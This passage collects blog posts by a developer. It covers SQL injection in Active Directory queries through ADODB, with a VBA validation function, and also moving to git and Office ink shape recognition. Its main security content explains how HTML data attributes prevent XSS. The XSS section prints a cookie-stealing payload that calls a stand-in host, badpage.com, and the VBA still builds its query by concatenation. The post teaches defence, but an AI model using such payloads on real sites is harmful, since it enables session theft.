That way, the question mark “?” gets replaced with “’youremail@example.com’” (including the single quote marks) and my injection attempt gets quoted in magical ways (usually, doubling single-quotes, but the parameter insertion is capable of knowing in what way it’s being inserted, and how exactly to quote the data).

4. In which I realise other people are idiot

uninterface

That’s the rather meaningful message:

Run-time error ‘-2147467262 (80004002)’:

No such interface supported

It doesn’t actually tell me which interface isn’t supported, so of course I spend a half hour trying to figure out what changed that might have gone wrong – whether I’m using a question mark where perhaps I might need a named variable, possibly preceded by an “@” sign, but no, that’s SQL stored procedures, which are almost never the SQL injection solution they claim to be, largely because the same idiot who uses concatenation in his web service also does the same stupid trick in his SQL stored procedures, but I’m rambling now and getting far away from the point if I ever had one, so…

The interface that isn’t supported is the ability to set parameters.

The single best solution to SQL injection just plain isn’t provided in the ADODB library and/or the ADsDSOObject provider.

Why on earth would you miss that out, Microsoft?

5. I get clever

So, the smart answer here is input validation where possible, and if you absolutely have to accept any and all input, you must quote the strings that you’re passing in.

In my case, because I’m dealing with email addresses, I think I can reasonably restrict my input to alphanumerics, the “@” sign, full stops, hyphens and underscores.
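That restriction is simple to express as an allow-list. Here is a sketch in Python rather than VBA; the function name is made up, “alphanumerics” is taken to mean ASCII letters and digits, and the extra check for exactly one “@” is my own addition rather than part of the rule above.

```python
import re

# Allow-list: ASCII letters, digits, "@", full stop, underscore, hyphen.
_ALLOWED = re.compile(r"[A-Za-z0-9@._-]+")


def is_acceptable_email(value: str) -> bool:
    """Accept only input made entirely of allow-listed characters."""
    if _ALLOWED.fullmatch(value) is None:
        return False
    # Assumption beyond the character rule: exactly one "@" sign.
    return value.count("@") == 1
```

The injection string from earlier fails this test on its very first quote mark, which is the point: anything that could break out of the quoted string never reaches the query.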

Input validation depends greatly on the type of your input. If it’s a string, that will need to be provided in your SQL request surrounded with single quotes – that means that any single quote in the string will need to be encoded safely. Usually that means doubling the quote mark, although you might choose to replace them with double quotes or back ticks.
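The quote-doubling approach looks like this as a Python sketch. The function name is made up, and whether a particular provider honours doubled quotes is something to test rather than assume; this only shows the transformation itself.

```python
def quote_sql_string(value: str) -> str:
    """Wrap a string in single quotes, doubling any single quotes inside it."""
    return "'" + value.replace("'", "''") + "'"


print(quote_sql_string("O'Brien@example.com"))
print(quote_sql_string("x' OR mail='*"))
```

With the quotes doubled, the injection attempt stays inside one string literal instead of closing it early.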

If your input is a number, you can be more restrictive in your input validation – only those characters that are actually parts of a number. That’s not necessarily as easy as it sounds – the letter “e” is often part of numbers, for instance, and you have to decide whether you’re going to accept bases other than 10. But from the perspective of securing against SQL injection, again that’s not too difficult to enforce.
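For numbers, one possible strict check is sketched below. The name isPlainDecimal is hypothetical, and the choice to reject exponents and other bases is only one of the decisions you could make here.

```javascript
// Hypothetical helper: accepts only plain base-10 numbers such as "42" or
// "-3.14". Exponent forms ("1e5") and other bases ("0x1F") are deliberately
// rejected; whether to accept them is a decision for your own application.
function isPlainDecimal(input) {
  return typeof input === "string" && /^-?[0-9]+(\.[0-9]+)?$/.test(input);
}

console.log(isPlainDecimal("-3.14"));       // true
console.log(isPlainDecimal("1 OR 1=1"));    // false
```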

Finally, of course, you have to decide what to do when bad input comes in – an error response, a static value, throw an exception, ignore the input and refuse to respond, etc. If you choose to signal an error back to the user, be careful not to provide information an attacker could find useful.

What’s useful to an attacker?

Sometimes the mere presence of an error is useful.

Certainly if you feed back to the attacker the full detail of the SQL query that went wrong – and people do sometimes do this! – you give the attacker far too much information.

Even feeding back the incorrect input can be a bad thing in many cases. In the Excel case I’m running into, that’s probably not easily exploitable, but you probably should be cautious anyway – if it’s an attacker causing an error, they may want you to echo back their input to exploit something else.

Call to Microsoft

Seriously, Microsoft, this is an unforgivable lapse – not only is there no ability to provide the single best protection, because you didn’t implement the parameter interface, but also your own samples provide examples of code that is vulnerable to SQL injections. [Here and here – the other examples I was able to find use hard-coded search filters.]

Microsoft, update your samples to demonstrate how to securely query AD through the ADODB library, and consider whether it’s possible to extend the provider with the parameter interface so that we can use the gold-standard protection.

Call to developers

Parse your parameters – make sure they conform to expected values. Complain to the user when they don’t. Don’t use lack of samples as a reason not to deliver secure components.

Finally – how I did it right

And, because I know a few of you will hope to copy directly from my code, here’s how I wound up doing this exact function.

Please, by all means review it for mistakes – I don’t guarantee that this is correct, just that it’s better than I found originally. For instance, one thing it doesn’t check for is if the user actually has a value set for the “mail” field in Active Directory – I can tell you for certain, it’ll give a null reference error if you have one of these users come back from your search.

Function GetEmail(email As String) As String
    ' Given one of this user's email addresses, find the canonical one.

    ' Pre-execution input validation - email must contain only recognised characters.
    ' (The trailing "-" in the character list matches a literal hyphen.)
    If email Like "*[!a-zA-Z0-9_@.-]*" Then
        GetEmail = "Illegal characters"
        Exit Function
    End If

    ' Find our default domain base to search from
    Set objRootDSE = GetObject("LDAP://RootDSE")
    strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

    ' Open a connection to AD
    Set ADOConnection = CreateObject("ADODB.Connection")
    ADOConnection.Provider = "ADsDSOObject"
    ADOConnection.Open "Active Directory Provider"

    ' Create a command
    Set ADCommand = CreateObject("ADODB.Command")
    ADCommand.ActiveConnection = ADOConnection

    ' Find user based on their email address
    ADCommand.CommandText = _
        "SELECT distinguishedName,userPrincipalName,mail FROM " & _
        strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

    ' Execute this command
    Set ADrecordset = ADCommand.Execute

    ' Post execution validation - we should have exactly one answer.
    If ADrecordset Is Nothing Or (ADrecordset.EOF And ADrecordset.BOF) Then
        GetEmail = "Not found"
        Exit Function
    End If
    If ADrecordset.RecordCount > 1 Then
        GetEmail = "Many matches"
        Exit Function
    End If

    ' Extract the canonical email address for this user.
    GetEmail = ADrecordset.Fields("Mail")

    ' Return.
End Function

As always, let me know if you find this at all useful.

Get on with git

Out with the old

Version control is one of those vital tools for developers that everyone has to use but very few people actually enjoy or understand.

So, it’s with no surprise that I noted a few months ago that the version control software on which I’ve relied for several years for my personal projects, Component Software’s CS-RCS, has not been built on in years, and cannot now be downloaded from its source site. [Hence no link from this blog]

Not so in with the new

I’ve used git before a few times in professional projects while I was working at Amazon, but relatively reluctantly – it has incredibly baroque and meaningless command-line options, and gives the impression that it was written by people who expected their users to be just as proficient with the ins and outs of version control as they are.

While I think it’s a great idea for developers to build software they would use themselves, I think it’s important to make sure that the software you build is also accessible to people who aren’t at the same level of expertise as you. After all, if your users were as capable as the developer, they would already have built the solution for themselves, so your greater user-base comes from accommodating novices to experts with simple points of entry and levels of improved mastery.

git, along with many other open source, community-supported tools, doesn’t really accommodate the novice.

As such, it means that most people who use it rely on “cookbooks” of sets of instructions. “If you want to do X, type commands Y and Z” – without an emphasis on understanding why you’re doing this.

This leads inexorably to a feeling that you’re setting yourself up for a later fall, when you decide you want to do an advanced task, but discover that a decision you’ve made early on has prevented you from doing the advanced task in the way you want.

That’s why I’ve been reluctant to switch to git.

So why switch now?

But it’s clear that git is the way forward in the tools I’m most familiar with – Visual Studio and its surrounding set of developer applications.

It’s one of those decisions I made some time ago, but have not enacted until now, because I had no idea how to start – properly. Every git repository I’ve worked with so far has either been set up by someone else, or set up by me, based on a cookbook, for a new project, and in a git environment that’s managed by someone else. I don’t even know if those terms, repository and environment, are the right terms for the things I mean.

There are a number of advanced things I want to do from the very first – particularly, I want to bring my code from the old version control system, along with its history where possible, into the new system.

And I have a feeling that this requires I understand the decisions I make when setting this up.

So, it was with much excitement that I saw a link to this arrive in my email:

[Image: capture20151224111306522]

Next thing is I’m going to watch this, and see how I’m supposed to work with git. I’ll let you know how it goes.

Auto convert inked shapes in PowerPoint–coming to OneNote

I happened upon a blog post by the Office team yesterday which surprised me, because it talked about a feature in PowerPoint that I’ve wanted ever since I first got my Surface 2.

Shape recognition

Here’s a link to documentation on how to use this feature in PowerPoint.

https://support.office.com/en-us/article/use-a-pen-to-draw-write-or-highlight-text-on-a-windows-tablet-6d76c674-7f4b-414d-b67f-b3ffef6ccf53

It seems like the obvious feature a tablet should have.

Here’s a video of me using it to draw a few random shapes:

But not just in PowerPoint – this should be in Word, in OneNote, in Paint, and pretty much any app that accepts ink.

And at last, OneNote

So here’s the blog post from Office noting that this feature will finally be available for OneNote in November.

https://blogs.office.com/2015/10/20/onenote-partners-with-fiftythree-to-support-pencil-and-paper-plus-shape-recognition-coming-soon/

On iPad, iPhone and Windows 10. Which I presume means it’ll only be on the Windows Store / Metro / Modern / Immersive version of OneNote.

That’s disappointing, because it should really be in every Office app. Hell, I’d update from Office 2013 tomorrow if this was a feature in Office 2016!

Let’s not stop there

Please, Microsoft, don’t stop at the Windows Store version of OneNote.

Shape recognition, along with handwriting recognition (which is apparently also hard), should be a natural part of my use of the Surface Pen. It should work the same across multiple apps.

That’s only going to happen if it’s present in multiple apps, and is a documented API which developers – of desktop apps as well as Store apps – can call into.

Well, desktop apps can definitely get that.

How can I put it into my own app?

I’ll admit that I haven’t had the time yet to build my own sample, but I’m hoping that this still works – there’s an API called “Ink Analysis”, which is exactly how you would achieve this in your app:

https://msdn.microsoft.com/en-us/library/ms704040.aspx

It allows you to analyse ink you’ve captured, and decide if it’s text or a drawing, and if it’s a drawing, what kind of drawing it might be.

[I’ve marked this with the tag “Alun’s Code” because I want to write a sample eventually that demonstrates this function.]

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.
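To make the mechanics concrete, here is a small sketch of what the server is effectively doing. The function renderNaive is a hypothetical stand-in for whatever template pastes the search term into the script block; I don’t know how any particular site builds this line, only what comes out the other end.

```javascript
// Hypothetical stand-in for a server-side template that pastes the search
// term straight into a script block, with no encoding at all.
function renderNaive(searchTerm) {
  return 's.prop2="' + searchTerm + '";';
}

const attack = '"-window.open("//badpage.com/"+document.cookie,"_top")-"';

console.log(renderNaive("kittens")); // s.prop2="kittens";
console.log(renderNaive(attack));
// s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";
```

The first quote in the attack string closes the string literal the developer opened, and everything after it is read as code.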

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hyphen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there are really only a few quoting rules to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML.
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;”.

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.
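Here is one way the “encode everything other than alphanumerics” shortcut could be sketched. The function name toQuotedAttributeValue is invented for this example, and most frameworks ship their own HTML encoder that you should prefer where one is available.

```javascript
// Hypothetical helper: encodes every character other than ASCII letters and
// digits as a numeric character reference (rules 2 and 3), then wraps the
// result in double quotes (rule 1).
function toQuotedAttributeValue(value) {
  const encoded = Array.from(String(value), (ch) =>
    /[A-Za-z0-9]/.test(ch) ? ch : "&#" + ch.codePointAt(0) + ";"
  ).join("");
  return '"' + encoded + '"';
}

console.log("<div data-search-term=" + toQuotedAttributeValue('a"b&c') + "></div>");
// <div data-search-term="a&#34;b&#38;c"></div>
```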

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick=&#9;"prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick=&#32;"prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

[Image: the sample links as shown in the Internet Explorer 11 Debugger]

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

[Image: the sample links as shown in the Internet Explorer 11 DOM Explorer]

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.
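If it helps to see the simplified parsing rule from the sidebar written down, here is a toy model of it. Both function names are made up, it knows only a handful of named entities, and a real browser’s parser handles many more cases than this, so use it to reason about the rule rather than to predict exactly what a browser does.

```javascript
// Toy model of the simplified rule described in the sidebar.
// Decodes numeric character references and a few common named entities.
function decodeEntities(text) {
  const named = { amp: "&", quot: '"', lt: "<", gt: ">", apos: "'" };
  return text.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, body) => {
    if (body[0] === "#") {
      const isHex = body[1].toLowerCase() === "x";
      const code = isHex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : match;
    }
    const key = body.toLowerCase();
    return Object.prototype.hasOwnProperty.call(named, key) ? named[key] : match;
  });
}

// Takes the text that follows the "=" sign and returns the attribute's value.
function readAttributeValue(afterEquals) {
  const text = afterEquals.replace(/^\s+/, "");
  const first = text[0];
  if (first === '"' || first === "'") {
    // Quoted: the value runs to the next quote of the same kind.
    const end = text.indexOf(first, 1);
    return decodeEntities(end === -1 ? text.slice(1) : text.slice(1, end));
  }
  // Unquoted: the value ends at the next whitespace (or the end of the tag).
  return decodeEntities(/^[^\s>]*/.exec(text)[0]);
}

console.log(readAttributeValue('"prompt("1")">'));            // prompt(
console.log(readAttributeValue('"prompt(&quot;1&quot;)">'));  // prompt("1")
```

In this model, the unencoded inner quote ends the value early, while the encoded one survives as part of the value, which is the point of rule 3.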

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.
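A short sketch of that lookup follows. The helper name readDataAttribute is my own invention, and it takes the document as a parameter purely so that it can be exercised outside a browser; in a page you would pass the real document object.

```javascript
// Hypothetical helper: reads one data-* attribute from the element with the
// given id. `doc` is any object with a getElementById method, so the same
// function works against the browser's document or a test stub.
function readDataAttribute(doc, elementId, attributeName) {
  const element = doc.getElementById(elementId);
  // getAttribute returns null when the attribute is missing.
  return element ? element.getAttribute(attributeName) : null;
}

// In a browser, with <div id="myDataDiv" data-search-term="a &amp; b"></div>
// in the page, this logs the decoded string: a & b
if (typeof document !== "undefined") {
  console.log(readDataAttribute(document, "myDataDiv", "data-search-term"));
}
```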

Other frameworks have ways of accessing this data attribute more easily – for instance, jQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHTML and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.
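As a minimal sketch, a conversion along these lines never treats the string as code. The name attributeToNumber and the choice to return null for bad input are assumptions of mine; pick whatever failure behaviour suits your page.

```javascript
// Hypothetical helper: converts an attribute string to a number without ever
// evaluating it as code. Returns null for anything that is not a finite number.
function attributeToNumber(text) {
  const value = Number.parseFloat(text);
  return Number.isFinite(value) ? value : null;
}

console.log(attributeToNumber("42.5"));     // 42.5
console.log(attributeToNumber("alert(1)")); // null
```

Bear in mind that parseFloat reads a leading numeric prefix and ignores whatever follows, so "12abc" comes back as 12. If that matters to you, validate the whole string first.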

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//-->
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.